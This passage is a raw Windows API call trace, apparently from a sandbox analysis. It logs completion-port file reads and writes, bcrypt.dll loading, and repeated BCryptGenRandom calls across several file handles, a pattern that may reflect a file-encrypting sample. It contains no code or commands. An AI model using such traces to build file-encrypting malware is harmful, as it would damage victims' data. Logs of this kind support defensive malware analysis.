(in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0179.546] WriteFile (in: hFile=0x2a8, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x2770, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0179.547] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0179.553] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.554] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.554] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0179.554] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.554] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.554] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0179.554] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0179.555] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0179.555] free (_Block=0x3e305b8) [0179.555] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0179.555] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0179.555] free (_Block=0x1fa91d0) [0179.555] free (_Block=0x1fa2ed8) [0179.555] free (_Block=0x1fa90b8) [0179.555] WriteFile (in: hFile=0x3cc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0179.555] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0179.559] CloseHandle (hObject=0x338) returned 1 [0179.559] free (_Block=0x3f70048) [0179.559] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0179.559] CloseHandle (hObject=0x3cc) returned 1 [0179.559] free (_Block=0x3e70008) [0179.559] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0179.561] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x7dc, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0179.561] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0179.562] CloseHandle (hObject=0x2a4) returned 1 [0179.562] free (_Block=0x3df0008) [0179.562] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0179.570] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.571] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.571] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0179.571] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.572] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.572] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0179.572] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0179.572] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0179.572] free (_Block=0x3e305b8) [0179.572] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0179.572] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0179.572] free (_Block=0x1fa91d0) [0179.572] free (_Block=0x1fa2ed8) [0179.572] free (_Block=0x1fa90b8) [0179.572] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0179.573] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0179.646] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x2142, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0179.656] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0179.664] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x2360, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0179.665] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0179.672] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x6cc0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0179.686] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0179.700] CloseHandle (hObject=0x3cc) returned 1 [0179.700] free (_Block=0x3d70450) [0179.700] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0179.702] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x8e0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0179.702] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0179.702] CloseHandle (hObject=0x2a8) returned 1 [0179.702] free (_Block=0x3df0008) [0179.702] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0179.705] ReadFile (in: hFile=0x338, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x7c4a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0179.715] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0179.721] CloseHandle (hObject=0x338) returned 1 [0179.721] free (_Block=0x3f70048) [0179.721] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0179.726] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1800, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0179.727] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0179.732] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.733] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.733] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0179.733] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.733] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.733] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0179.733] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0179.733] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0179.733] free (_Block=0x3e305b8) [0179.733] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0179.733] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0179.734] free (_Block=0x1fa91d0) [0179.734] free (_Block=0x1fa2ed8) [0179.734] free (_Block=0x1fa90b8) [0179.734] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0179.734] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0179.746] CloseHandle (hObject=0x338) returned 1 [0179.746] free (_Block=0x3d70450) [0179.746] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0179.765] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.765] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.765] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0179.765] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.766] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.766] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0179.766] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0179.766] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0179.766] free (_Block=0x3e305b8) [0179.766] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0179.766] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0179.766] free (_Block=0x1fa91d0) [0179.766] free (_Block=0x1fa2ed8) [0179.766] free (_Block=0x1fa90b8) [0179.767] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0179.767] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0179.770] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1370, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0179.770] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0179.770] WriteFile (in: hFile=0x3cc, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x170, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0179.771] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0180.436] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.446] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.446] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0180.446] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.447] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.447] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0180.447] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0180.447] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0180.447] free (_Block=0x3e305b8) [0180.447] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0180.447] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0180.448] free (_Block=0x1fa91d0) [0180.448] free (_Block=0x77d7a8) [0180.448] free (_Block=0x1fa90b8) [0180.448] WriteFile (in: hFile=0x338, lpBuffer=0x3f7007c, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 0x0 [0180.448] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0180.451] ReadFile (in: hFile=0x338, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x250, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 0x0 [0180.451] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0180.460] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.460] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.460] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0180.461] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.461] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.461] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0180.461] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0180.461] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0180.461] free (_Block=0x3e305b8) [0180.461] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0180.461] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0180.462] free (_Block=0x1fa91d0) [0180.462] free (_Block=0x77d7a8) [0180.462] free (_Block=0x1fa90b8) [0180.462] WriteFile (in: hFile=0x2a8, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0180.462] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0180.462] ReadFile (in: hFile=0x2a8, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x2a9, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0180.463] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0187.576] WriteFile (in: hFile=0x3cc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0xd750, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0187.576] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0187.582] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0187.582] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0187.582] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0187.582] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0187.583] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0187.583] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0187.583] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0187.583] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0187.583] free (_Block=0x3e305b8) [0187.583] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0187.583] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0187.583] free (_Block=0x1fa91d0) [0187.583] free (_Block=0x1fa2ed8) [0187.583] free (_Block=0x1fa90b8) [0187.583] WriteFile (in: hFile=0x338, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0187.584] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0187.587] WriteFile (in: hFile=0x170, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x100b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0187.587] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0187.604] WriteFile (in: hFile=0x338, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0xf820, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0187.604] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0190.681] CloseHandle (hObject=0x2a4) returned 1 [0190.681] free (_Block=0x3d70450) [0190.681] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0190.690] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0190.690] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0190.690] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0190.690] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0190.691] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0190.691] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0190.691] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0190.691] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0190.691] free (_Block=0x3e305b8) [0190.691] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0190.691] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0190.692] free (_Block=0x1fa91d0) [0190.692] free (_Block=0x1fa2ed8) [0190.692] free (_Block=0x1fa90b8) [0190.692] WriteFile (in: hFile=0x338, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0190.694] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0190.704] WriteFile (in: hFile=0x3cc, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0190.705] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0190.712] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0190.713] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0190.713] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0190.713] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0190.714] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0190.714] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0190.714] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0190.714] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0190.714] free (_Block=0x3e305b8) [0190.714] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0190.714] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0190.714] free (_Block=0x1fa91d0) [0190.714] free (_Block=0x1fa2ed8) [0190.715] free (_Block=0x1fa90b8) [0190.715] WriteFile (in: hFile=0x2a4, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0190.716] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, 